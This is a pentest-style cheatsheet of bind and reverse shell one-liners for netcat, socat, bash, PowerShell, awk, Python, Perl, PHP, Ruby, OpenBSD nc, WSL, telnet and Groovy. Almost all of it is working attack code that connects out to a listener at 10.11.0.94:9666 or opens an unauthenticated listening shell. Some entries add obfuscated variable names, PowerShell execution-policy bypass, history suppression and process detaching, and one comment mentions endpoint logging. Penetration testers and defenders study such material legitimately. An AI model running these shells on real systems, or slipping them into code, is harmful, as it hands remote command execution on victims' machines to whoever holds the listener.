Bind and Reverse Shell Cheatsheet
(Throughout, 10.11.0.94:9666 is a placeholder for the attacker-controlled listener host/port — substitute your own. Every transport below is plaintext and unauthenticated: whoever can reach the port, or connect back, gets the shell. Use only on systems you are authorized to test.)

### NETCAT, NC, NCAT, SOCAT

# BIND

# Linux
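# Linux TCP bind shells: each listens on 9666 and hands the connecting peer a shell.
# -c/-e are nc.traditional / ncat options; the OpenBSD-derived nc has no -e, hence the
# fifo-based forms in the OpenBSD section further down.
nc -lvp 9666 -c /bin/bash
nc -v -l -p 9666 -e /bin/bash
ncat -v -l -p 9666 -e /bin/sh
# socat bind: listen, do not connect. The original tcp:10.11.0.94:9666 form here was a
# reverse shell (it is duplicated verbatim under REVERSE below). reuseaddr lets the
# listener restart on the same port immediately; pty/setsid/sigint/sane give the peer a
# proper interactive terminal with ^C delivered to the shell.
socat tcp-listen:9666,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane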

# UDP
# socat UDP bind: waits for a datagram on 9666 and serves that peer an interactive
# bash on a pty, backgrounded with '&'. Mind the redirection order: 2>&1 is applied
# before >/dev/null, so socat's stderr lands on the original stdout (your terminal)
# and only its stdout is discarded — swap the two to silence both.
socat udp-listen:9666 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

# Windows — no bind example recorded here; the nc.exe reverse shells under REVERSE use -e cmd.exe, and the same -l -p <port> -e form shown for Linux applies.

# REVERSE

# Linux
# TCP
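# Linux TCP reverse shells: the target connects out to the listener on 10.11.0.94:9666
# (start the listener first). -e/-c need nc.traditional or ncat.
nc -e /bin/sh 10.11.0.94 9666
# The payload for sh -c must be a single quoted word; bare parentheses as written
# originally are a syntax error in sh/bash and the line never ran.
sh -c 'netcat -e /bin/sh 10.11.0.94 9666'
nc 10.11.0.94 9666 -c /bin/bash
# socat with pty/setsid/sigint/sane gives a fully interactive shell (job control, ^C
# passed through) — the most comfortable option when socat is present on the target.
socat tcp-connect:10.11.0.94:9666 exec:"bash -li",pty,stderr,setsid,sigint,sane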

# UDP
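# UDP reverse shell with nc.traditional (-u). Data received from the listener flows
# nc stdout -> pipe -> bash stdin; bash's output is written into the fifo, which nc
# reads as its stdin and sends back. Added 2>&1 on the bash group: `bash -i` writes
# its prompt (and all error messages) to stderr, which previously stayed on the local
# terminal, so the listener never saw a prompt. The fifo is created as ./fifo in the
# current directory and is left behind; there is no pty.
mkfifo fifo ; nc.traditional -u 10.11.0.94 9666 < fifo | { bash -i; } > fifo 2>&1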

#Windows
# Windows reverse shells via netcat (-e requires a Windows nc build that still ships
# the -e option). Note the second form uses port 9999, unlike the 9666 used everywhere
# else in this sheet.
nc -e cmd.exe 10.11.0.94 9666
nc.exe -e cmd 10.11.0.94 9999

### Bash

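# REVERSE only: bash's /dev/tcp pseudo-device can connect out but cannot listen, so
# none of these is a bind shell.
# Open the socket on fd 4 in *this* shell, then attach bash to it. The two commands
# must be sequenced with ';' (or '&&'): with the original '&' the exec ran in a
# backgrounded subshell, fd 4 never existed in the calling shell, and `bash <&4`
# failed with "Bad file descriptor".
exec 4<>/dev/tcp/10.11.0.94/9666; bash <&4 >&4 2>&4
# nc reverse shell wrapped so it can be passed wherever a single command string is
# expected (host normalized to the 10.11.0.94 placeholder used elsewhere).
/bin/bash -c 'nc -e /bin/bash 10.11.0.94 9666'

# Classic one-liner: interactive bash with stdout+stderr on the socket and stdin
# read back from the same socket.
/bin/bash -i >& /dev/tcp/10.11.0.94/9666 0>&1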

### Powershell

# Bind
# TCP
# PowerShell TCP bind shell. Listens on 9666, accepts a single client, writes a fake
# "Windows PowerShell ... Copyright" banner and a 'PS <cwd>> ' prompt, then reads each
# chunk from the socket and runs it verbatim with Invoke-Expression — no
# authentication, so any peer that can connect gets code execution as the current
# user. Command output plus the most recent $error entry are echoed back; the listener
# stops once the client disconnects. -nop -ep bypass skip the profile and execution
# policy. NOTE(review): the policy bypass and IEX-on-socket-input pattern are the kind
# of thing endpoint logging is tuned for — confirm the target's logging posture first.
powershell.exe -nop -ep bypass -Command "$POEPuBOnP=9666;$QiCQYM=[System.Net.Sockets.TcpListener]$POEPuBOnP;$QiCQYM.Start();$BCExYicOF=$QiCQYM.AcceptTCPClient();$uOEzWnUgaDVjjv=$BCExYicOF.GetStream();[byte[]]$PuIIgTmzFsyCw=0..65535|%{0};$HNWmkQjMruV=([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user '+$env:username+' on '+$env:computername+'`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n');$uOEzWnUgaDVjjv.Write($HNWmkQjMruV,0,$HNWmkQjMruV.Length);$HNWmkQjMruV=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$uOEzWnUgaDVjjv.Write($HNWmkQjMruV,0,$HNWmkQjMruV.Length);while(($YfipECz=$uOEzWnUgaDVjjv.Read($PuIIgTmzFsyCw,0,$PuIIgTmzFsyCw.Length)) -ne 0){$uIKBicIvZGuxL=([text.encoding]::ASCII).GetString($PuIIgTmzFsyCw,0,$YfipECz);try{$xliZgEUhKIhR=(Invoke-Expression -command $uIKBicIvZGuxL 2>&1 | Out-String )}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$POEPuBOnP0=$xliZgEUhKIhR+ 'PS '+(Get-Location).Path + '> ';$POEPuBOnP1=($error[0] | Out-String);$error.clear();$POEPuBOnP0=$POEPuBOnP0+$POEPuBOnP1;$HNWmkQjMruV=([text.encoding]::ASCII).GetBytes($POEPuBOnP0);$uOEzWnUgaDVjjv.Write($HNWmkQjMruV,0,$HNWmkQjMruV.Length);$uOEzWnUgaDVjjv.Flush();};$BCExYicOF.Close();if($QiCQYM){$QiCQYM.Stop();};"

# Reverse
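# PowerShell TCP reverse shell: connects to 10.11.0.94:9666, then loops reading up to
# 64 KiB from the socket, running it with iex and writing the output plus a
# 'PS <cwd>>' prompt back. No TLS, no auth; non-ASCII input is mangled by the ASCII
# decode. Fixed: Flush must be called with parentheses — a bare `$stream.Flush` in
# PowerShell just evaluates to the method object and never runs (the bind variant
# above already used Flush()). NetworkStream.Write sends immediately, which is why
# the omission mostly went unnoticed.
powershell.exe -nop -ep bypass -Command "$WZwFHYUAklT=new-object system.net.sockets.tcpclient('10.11.0.94',9666);$RAgjhqTxqkY=$WZwFHYUAklT.GetStream();[byte[]]$rOvfftiCPHyHH=0..65535|%{0};while(($VziNCnd=$RAgjhqTxqkY.Read($rOvfftiCPHyHH,0,$rOvfftiCPHyHH.Length)) -ne 0){;$JTsudWp=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($rOvfftiCPHyHH,0,$VziNCnd);$XDttpW=(iex $JTsudWp 2>&1|out-string);$lHhMPyKR=$XDttpW+'PS '+(pwd).Path+'>';$HKUgVNdPCJA=([text.encoding]::ASCII).GetBytes($lHhMPyKR);$RAgjhqTxqkY.Write($HKUgVNdPCJA,0,$HKUgVNdPCJA.Length);$RAgjhqTxqkY.Flush()};$WZwFHYUAklT.close()"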



### AWK
# Bind
# TCP
# gawk TCP bind shell. The /inet/tcp special files are a gawk extension — mawk and
# busybox awk cannot do this. "/inet/tcp/PORT/0/0" listens on 9666; every line
# received is run as a command (`cmd | getline`) and its output is written back on
# the socket coprocess. The port is handed in with -v rather than interpolated into
# the program text.
VFeFQbKCIGEmWWd=9666;awk -v BFliPDXzHtF="$VFeFQbKCIGEmWWd" 'BEGIN{cJIRurZJkzLWN="/inet/tcp/"BFliPDXzHtF"/0/0";for(;cJIRurZJkzLWN|&getline mjEQvNrf;close(mjEQvNrf))while(mjEQvNrf|getline)print|&cJIRurZJkzLWN;close(cJIRurZJkzLWN)}'

# Reverse
# TCP
# gawk TCP reverse shell (gawk-only, see above). "/inet/tcp/0/HOST/PORT" connects out
# to 10.11.0.94:9666; the loop prints a "shell>" prompt, reads one line, runs it and
# sends its output back, until the line "exit" is received. `while(4224075)` is just
# an always-true constant; the trailing /dev/null keeps awk from reading stdin.
RvVoCsjjsJMzwK=9666;awk -v oysItzsoEHe="$RvVoCsjjsJMzwK" 'BEGIN{blCZpqVJEORlPrD="/inet/tcp/0/10.11.0.94/"oysItzsoEHe;while(4224075){do{printf "shell>"|&blCZpqVJEORlPrD;blCZpqVJEORlPrD|& getline EwwinCCqNYEM;if(EwwinCCqNYEM){while((EwwinCCqNYEM|& getline)>0)print $0|&blCZpqVJEORlPrD;close(EwwinCCqNYEM);}}while(EwwinCCqNYEM!="exit")close(blCZpqVJEORlPrD);break}}' /dev/null


### Python

#Bind
# TCP
# Python TCP bind shell (works on 2 and 3). Binds all interfaces ('') on 9666, accepts
# one client, dup2()s the socket onto fds 0/1/2 and runs `bash -i` on it; the process
# ends when that shell exits. No pty, no SO_REUSEADDR (a quick restart may fail with
# "Address already in use").
python -c "import socket,subprocess,os;vAWzivjLBkVfc=socket.socket(socket.AF_INET,socket.SOCK_STREAM);vAWzivjLBkVfc.bind(('',9666));vAWzivjLBkVfc.listen(1);conn,addr=vAWzivjLBkVfc.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);doPYBrXyzk=subprocess.call(['/bin/bash','-i'])"
# UDP
# Python 2 only UDP bind shell: Popen().communicate() returns bytes, and "".join /
# sendto of a str would raise TypeError on Python 3. Each loop iteration re-creates
# and re-binds the socket on 0.0.0.0:9666, runs the datagram payload through the
# shell (shell=True), and sends stdout+stderr back in one datagram to whatever
# source address the packet claimed — UDP source addresses are trivially spoofed.
# Commands are capped at 8096 bytes; very large outputs may exceed what one
# datagram can carry.
python -c 'while 3699958: from subprocess import Popen,PIPE;from socket import socket,AF_INET,SOCK_DGRAM;ctertNWyff=socket(AF_INET,SOCK_DGRAM);ctertNWyff.bind(("0.0.0.0",9666));uZpZoqEhjG,OeEdonFxnjHdQC=ctertNWyff.recvfrom(8096);VAINWEL=Popen(uZpZoqEhjG,shell=True,stdout=PIPE,stderr=PIPE).communicate();ctertNWyff.sendto("".join([VAINWEL[0],VAINWEL[1]]),OeEdonFxnjHdQC)'

#Reverse
# TCP reverse shell, no pty: connect to 10.11.0.94:9666, dup2 the socket onto fds
# 0/1/2 and run `bash -i`. Works on Python 2 and 3.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.94",9666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
# TCP
# Same as above but with a real pty: pty.spawn runs bash on a pseudo-terminal and
# shuttles bytes between it and fds 0/1, which are now the socket, so interactive
# programs (sudo, vi, tab completion) work. HISTFILE=/dev/null is placed in the
# child's environment so bash does not write a history file.
python -c "import os;import pty;import socket;gGCkZIwXybuZ='10.11.0.94';yCbIpRMugNIjpK=9666;QfTnACeu=socket.socket(socket.AF_INET,socket.SOCK_STREAM);QfTnACeu.connect((gGCkZIwXybuZ,yCbIpRMugNIjpK));os.dup2(QfTnACeu.fileno(),0);os.dup2(QfTnACeu.fileno(),1);os.dup2(QfTnACeu.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');QfTnACeu.close();"
# UDP
# UDP variant of the pty shell: connect() on a SOCK_DGRAM socket fixes the peer so
# plain read/write work, but every write becomes one datagram — output can be lost
# or reordered, so expect a rougher session than over TCP.
python -c "import os;import pty;import socket;nZgEXRtSRzqC='10.11.0.94';VNlUlPGxg=9666;gZrLtbKn=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);gZrLtbKn.connect((nZgEXRtSRzqC,VNlUlPGxg));os.dup2(gZrLtbKn.fileno(),0);os.dup2(gZrLtbKn.fileno(),1);os.dup2(gZrLtbKn.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');gZrLtbKn.close();"

#TTY Upgrade
# Run inside an existing non-tty shell (e.g. one obtained via nc -e) to get bash on a
# pseudo-terminal, so prompts, job control and full-screen programs behave.
python -c 'import pty;pty.spawn("/bin/bash");'

### Perl

# BIND
# TCP
# Perl TCP bind shell on 9666 (all interfaces). The for loop looks like it serves
# clients forever, but exec() replaces the perl process with `bash -i`, so only the
# first connection is ever served; once that shell exits nothing is listening.
# No SO_REUSEADDR — an immediate restart may fail with EADDRINUSE.
perl -MSocket -e '$ZYrErhgsAQLkOn=9666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($ZYrErhgsAQLkOn, INADDR_ANY));listen(S,SOMAXCONN);for(;$ZYrErhgsAQLkOn=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'

# UDP
# Perl UDP bind shell on 9666: each datagram (max 1024 bytes) is run through the
# shell via qx and the output sent back to the last sender. The first
# `new IO::Socket::INET->new()` object is discarded by the immediate reassignment,
# and peerhost/peerport are computed but never used — both are harmless leftovers.
# Replies go to whatever source address the packet carried (spoofable).
perl -MIO::Socket::INET -e '$|=1;$osZpTISlDfXdpu=new IO::Socket::INET->new();$osZpTISlDfXdpu = new IO::Socket::INET(LocalPort => 9666,Proto => "udp");while(3935169){ $osZpTISlDfXdpu->recv($nnuPTwDEcIcVzx,1024);$UImIweTXXwHLLW=$osZpTISlDfXdpu->peerhost();$McejSrrMbnv=$osZpTISlDfXdpu->peerport();$eNUwuwQRR=qx($nnuPTwDEcIcVzx);$osZpTISlDfXdpu->send($eNUwuwQRR);}'

# REVERSE
# TCP
# Perl TCP reverse shell: connect to 10.11.0.94:9666, dup the socket onto
# STDIN/STDOUT/STDERR and exec `sh -i`. The \$ escapes are only there because the
# program is in shell double quotes.
perl -MSocket -e "\$mldtfJqywzinf='10.11.0.94';\$tFCaIt=9666;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$tFCaIt,inet_aton(\$mldtfJqywzinf)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};"

# Detaching variant: fork, let the parent exit, then connect and send a "shell>"
# prompt. STDIN is re-opened on the socket; `$~` holds the name of the currently
# selected output handle (default "STDOUT"), so `$~->fdopen` re-opens STDOUT on the
# socket too. Each line read is run with system(). `$~` survives the shell's double
# quotes unexpanded because it is not a valid shell parameter name.
perl -MIO::Socket::INET -e "\$otVtYALdNKLxAhu=fork;exit,if(\$otVtYALdNKLxAhu);\$gGysZRBGM=new IO::Socket::INET(PeerAddr,'10.11.0.94:'.9666);\$gGysZRBGM->send('shell>');STDIN->fdopen(\$gGysZRBGM,r);$~->fdopen(\$gGysZRBGM,w);system\$_ while<>;"

# UDP
# Perl UDP reverse shell: sends a "shell>" prompt datagram to 10.11.0.94:9666, waits
# for a reply (max 1024 bytes), runs it via qx and sends the output back, forever.
# peerhost/peerport are computed but unused. Output is sent as a single datagram,
# so very long output may not fit.
perl -MIO::Socket::INET -e '$|=1;$TIUfoZfWUdApiE = new IO::Socket::INET(PeerAddr => "10.11.0.94:".9666,Proto => "udp");while(3197178){$TIUfoZfWUdApiE->send("shell>");$TIUfoZfWUdApiE->recv($SwjGyTPLZSdP,1024);$LMtFaAsjjeNFW=$TIUfoZfWUdApiE->peerhost();$STiYluqBdRR=$TIUfoZfWUdApiE->peerport();$YAaVWn=qx($SwjGyTPLZSdP);$TIUfoZfWUdApiE->send($YAaVWn);}'


# Reported (unverified) as not working on Windows — presumably because fork is emulated there. Same construction as the -MIO::Socket::INET reverse shell above, on port 4444, with the missing spaces and quoting restored: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.11.0.94:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# Same bind shell as the -MSocket one above, but on port 4444 and exec'ing `sh -i`.
# As there, exec replaces the interpreter, so only the first connection is served.
perl -e 'use Socket;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S, SOMAXCONN);for(; $p= accept(C, S); close C) {open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/sh -i");};'

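#!/usr/bin/perl
# Forking TCP bind shell: listens on $LISTEN_PORT on all interfaces and hands every
# accepted connection its own $SHELL with stdin/stdout/stderr wired to the socket.
# Unauthenticated and unencrypted — anyone who can reach the port gets the shell.
#
# Fixes over the original: accept() failures are no longer forked on, the parent
# closes its copy of each connection (it previously kept every client fd open for
# the lifetime of the listener), and exited children are reaped instead of lingering
# as zombies.
use strict;
use warnings;
use Socket;

my $SHELL       = "/bin/bash -i";
my $LISTEN_PORT = 4444;

# Children exec the shell and never return to perl; let the kernel reap them so the
# long-running listener does not accumulate zombies.
$SIG{CHLD} = 'IGNORE';

my $protocol = getprotobyname('tcp');
socket(my $srv, PF_INET, SOCK_STREAM, $protocol) || die "Cant create socket\n";
# Allow an immediate restart on the same port after the listener is killed.
setsockopt($srv, SOL_SOCKET, SO_REUSEADDR, 1);
bind($srv, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "Cant open port\n";
listen($srv, 3) || die "Cant listen port\n";

while (1) {
    # accept() can fail (EINTR, fd exhaustion); retry rather than fork on a dead handle.
    my $peer = accept(my $conn, $srv) or next;
    my $pid = fork;
    die "Cannot fork\n" unless defined $pid;
    if ($pid) {
        # Parent: the child owns this connection; drop our descriptor so the
        # socket is released as soon as the child exits.
        close $conn;
        next;
    }
    # Child: the listening socket is not needed here.
    close $srv;
    open STDIN,  "<&", $conn or die "Cant dup stdin\n";
    open STDOUT, ">&", $conn or die "Cant dup stdout\n";
    open STDERR, ">&", $conn or die "Cant dup stderr\n";
    # $SHELL contains a space, so exec goes through /bin/sh -c (as in the original).
    # Execution only continues past this line if exec itself fails; STDERR is the
    # socket by now, so the peer sees the message.
    exec $SHELL or die "Cant execute $SHELL\n";
}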

### PHP

# Bind
# TCP
# PHP TCP bind shell: binds 0.0.0.0:9666, accepts one client, then loops: write a
# "$ " prompt, read up to 100 bytes (the per-command length cap), run it with popen
# and stream the output back one character at a time. Exits when the prompt write
# fails, i.e. when the client goes away. `while(9334434)` is an always-true constant.
php -r '$FOMuQWaHtM=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($FOMuQWaHtM,"0.0.0.0",9666);socket_listen($FOMuQWaHtM,1);$fFzXOtE=socket_accept($FOMuQWaHtM);while(9334434){if(!socket_write($fFzXOtE,"$ ",2))exit;$sAVHPeXYXH=socket_read($fFzXOtE,100);$RLiAMNPvRgtL=popen("$sAVHPeXYXH","r");while(!feof($RLiAMNPvRgtL)){$TnwbpufPufnDP=fgetc($RLiAMNPvRgtL);socket_write($fFzXOtE,$TnwbpufPufnDP,strlen($TnwbpufPufnDP));}}'

# UDP
# PHP UDP bind shell on 0.0.0.0:9666: each datagram (max 1024 bytes) is run via
# shell_exec and the result sent back to the source address/port of that packet.
# The reply is passed with a length of 1024, so command output longer than that is
# truncated. Source addresses are unauthenticated and spoofable.
php -r '$QWFKJB=socket_create(AF_INET,SOCK_DGRAM, 0);socket_bind($QWFKJB,"0.0.0.0",9666);while(3962955){socket_recvfrom($QWFKJB,$uENShOlCyH,1024,0,$NGsgNeu,$ZfowrRFLJwSuTZ);$tXjeFraPPdfE=shell_exec($uENShOlCyH);socket_sendto($QWFKJB,$tXjeFraPPdfE,1024,0,$NGsgNeu,$ZfowrRFLJwSuTZ);}'


# Reverse
# PHP TCP reverse shell: fsockopen() to 10.11.0.94:9666, then exec `sh -i` with its
# stdio redirected to fd 3. This relies on the new socket being the lowest free
# descriptor (3) in the php process — true for `php -r` from the CLI; under a web
# SAPI with other files open the number may differ and the shell gets no socket.
php -r "\$dfgIhOODFaCqN=fsockopen('10.11.0.94',9666);exec('/bin/sh -i <&3 >&3 2>&3');"

### Ruby

# Bind
# TCP
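# Ruby TCP bind shell: accepts one client on 9666, closes the listener, re-opens
# stdin/stdout/stderr on the socket and runs each non-blank line through IO.popen,
# echoing the output lines back. Fixed: the output call referenced an undefined `c`
# (a leftover from renaming), which raised NameError inside the `rescue nil` and so
# silently produced no output for every command — it now writes to the accepted
# socket.
ruby -rsocket -e 'mBigOrQfqI=TCPServer.new(9666);zfiivTqXCE=mBigOrQfqI.accept;mBigOrQfqI.close();$stdin.reopen(zfiivTqXCE);$stdout.reopen(zfiivTqXCE);$stderr.reopen(zfiivTqXCE);$stdin.each_line{|cwxkhQXR|cwxkhQXR=cwxkhQXR.strip;next if cwxkhQXR.length==0;(IO.popen(cwxkhQXR,"rb"){|nEONHcjSuRgMjQy|nEONHcjSuRgMjQy.each_line{|cViuBA|zfiivTqXCE.puts(cViuBA.strip)}})rescue nil}'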

# UDP
# Ruby UDP bind shell on 0.0.0.0:9666: each datagram (max 1024 bytes) is run with
# Open3.capture3 and only its stdout is sent back (stderr and the exit status are
# captured but dropped) to the sender's address (recvfrom addr[3]) and port (addr[1]).
ruby -rsocket -e 'require "open3";zopVJpIS=UDPSocket.new;zopVJpIS.bind("0.0.0.0",9666);loop do zlFwIty,vsLPTd=zopVJpIS.recvfrom(1024);fpTqoolwHhea,bgcURfii,fNUPswRpfss=Open3.capture3(zlFwIty);zopVJpIS.send(fpTqoolwHhea,0,vsLPTd[3],vsLPTd[1]); end'

# Reverse
# Ruby TCP reverse shell: forks and lets the parent exit (detaches), connects to
# 10.11.0.94:9666, then loops sending a "shell>" prompt, reading one line, running it
# with IO.popen and sending the output back. Ends when gets returns nil (peer closed).
ruby -rsocket -e "exit if fork;wZfKvvoaDS=TCPSocket.new('10.11.0.94',9666);while(wZfKvvoaDS.print 'shell>';kOdEYNAyAGl=wZfKvvoaDS.gets);IO.popen(kOdEYNAyAGl,'r'){|npailbTCc|wZfKvvoaDS.print npailbTCc.read}end"

### OpenBSD

# BIND
# TCP
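# OpenBSD-nc TCP bind shell (no -e available): a fifo carries the listener's input
# into `sh -i`, whose stdout+stderr flow back out through nc. The fifo now gets an
# unpredictable name from mktemp: the original fixed /tmp path plus an unconditional
# rm let any local user pre-plant a file or symlink there. The fifo is removed once
# nc exits.
F=$(mktemp -u) && mkfifo "$F" && cat "$F"|/bin/sh -i 2>&1|nc -lvp 9666 >"$F"; rm -f -- "$F"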

# UDP
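# bash-only (coproc) UDP bind shell with OpenBSD nc: nc listens on UDP 9666 as a
# coprocess and exec replaces this shell with a bash whose stdio is wired to nc's
# pipes. Fixed the stray 0 in `<&0${COPROC[0]}` — it is a typo that may have worked
# by accident only because bash reads "0NN" as decimal NN; the intended descriptor
# is ${COPROC[0]}.
coproc nc -luvp 9666; exec /bin/bash <&"${COPROC[0]}" >&"${COPROC[1]}" 2>&1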

# Reverse
# TCP
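# OpenBSD-nc TCP reverse shell via fifo: nc connects to 10.11.0.94:9666, what it
# receives is read from the fifo into `sh -i`, and the shell's stdout+stderr are
# piped into nc. The fifo now gets an unpredictable name (mktemp -u) instead of a
# fixed /tmp path that another local user could pre-create; it is removed when nc
# exits.
F=$(mktemp -u) && mkfifo "$F" && cat "$F"|/bin/sh -i 2>&1|nc 10.11.0.94 9666 >"$F"; rm -f -- "$F"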

# UDP
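# UDP reverse shell via a named pipe (mknod p). Fixed: the entry is filed under UDP
# but the original nc invocation had no -u, so it actually opened a TCP connection.
# Unpredictable fifo name as above. Only bash's stdout is sent back (no 2>&1), so
# prompts and errors stay local — add `2>&1` after `1>"$F"` if you want them.
F=$(mktemp -u) && mknod "$F" p && nc -u 10.11.0.94 9666 0<"$F"|/bin/bash 1>"$F"; rm -f -- "$F"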



### Windows Subsystem For Linux
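# Reaching Linux-side nc/bash through WSL from a Windows foothold. The
# `echo system(...)` lines are PHP (e.g. placed in a web-shell file); the `d.php:`
# prefix on the last one appears to be the file name it was pulled from, not part of
# the command.
# Sends only a directory listing, not a shell — useful as a connectivity check.
echo system("wsl.exe bash -c 'ls|nc 10.11.0.94 9666'");
# The whole command must be ONE argument to -c. Unquoted, `bash -c nc` runs nc with
# no arguments and `-e /bin/bash ...` merely become positional parameters.
c:\distros\ubuntu\ubuntu.exe run /bin/bash -c 'nc -e /bin/bash 10.11.0.94 9666'
# bash /dev/tcp reverse shell as root inside WSL (assumes passwordless sudo — confirm).
# exec and bash must be sequenced with ';': with '&' the exec runs in a backgrounded
# subshell and fd 4 never exists for the bash that follows.
c:\windows\sysnative\bash.exe -c "sudo /bin/bash -c 'exec 4<>/dev/tcp/10.11.0.94/9666; bash <&4 >&4 2>&4'"
d.php:echo system('c:/windows/sysnative/bash.exe -c "nc -c /bin/bash 10.11.0.94 9666"');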

### Telnet
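# telnet-only reverse shell (no nc on the target). The payload must be one quoted
# string — the original `sh -c (...)` is a shell syntax error and never ran. Two
# separate telnet connections are opened: the first delivers what is typed at the
# listener into sh's stdin (the 3845 s sleep only keeps that telnet's own stdin open
# so it does not quit on EOF), the second carries sh's stdout+stderr back. Both go to
# the same port here, so the listener must accept two connections — or run two
# listeners and change the second port accordingly. Runs detached in the background.
sh -c '(sleep 3845|telnet 10.11.0.94 9666|while : ; do sh && break; done 2>&1|telnet 10.11.0.94 9666 >/dev/null 2>&1 &)'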

### Groovy
# Reverse
# Groovy/Java TCP reverse shell (e.g. from a Jenkins script console). Starts cmd.exe
# with stderr merged into stdout, connects to 10.11.0.94:9666 and polls every 50 ms,
# copying process output to the socket and socket input to the process. The
# try{exitValue()}catch{} is the liveness check — exitValue throws while the process
# is still running, so the loop ends only once the shell exits. Swap "cmd.exe" for
# "/bin/sh" on a Linux target.
groovysh -e 'String AJmQZT="10.11.0.94";int ZUKfnXOsqWWHV=9666;String xwwkhjWJZhWa="cmd.exe";Process YkZrixXErq=new ProcessBuilder(xwwkhjWJZhWa).redirectErrorStream(true).start();Socket LghqfD=new Socket(AJmQZT,ZUKfnXOsqWWHV);InputStream DNaQnEkhi=YkZrixXErq.getInputStream(),KmomutfOCfYHxd=YkZrixXErq.getErrorStream(), AJmQZT0=LghqfD.getInputStream();OutputStream EfIWHiSnqN=YkZrixXErq.getOutputStream(),DkfcqADYwX=LghqfD.getOutputStream();while(!LghqfD.isClosed()){while(DNaQnEkhi.available()>0)DkfcqADYwX.write(DNaQnEkhi.read());while(KmomutfOCfYHxd.available()>0)DkfcqADYwX.write(KmomutfOCfYHxd.read());while(AJmQZT0.available()>0)EfIWHiSnqN.write(AJmQZT0.read());DkfcqADYwX.flush();EfIWHiSnqN.flush();Thread.sleep(50);try{YkZrixXErq.exitValue();break;}catch(Exception e){}};YkZrixXErq.destroy();LghqfD.close();'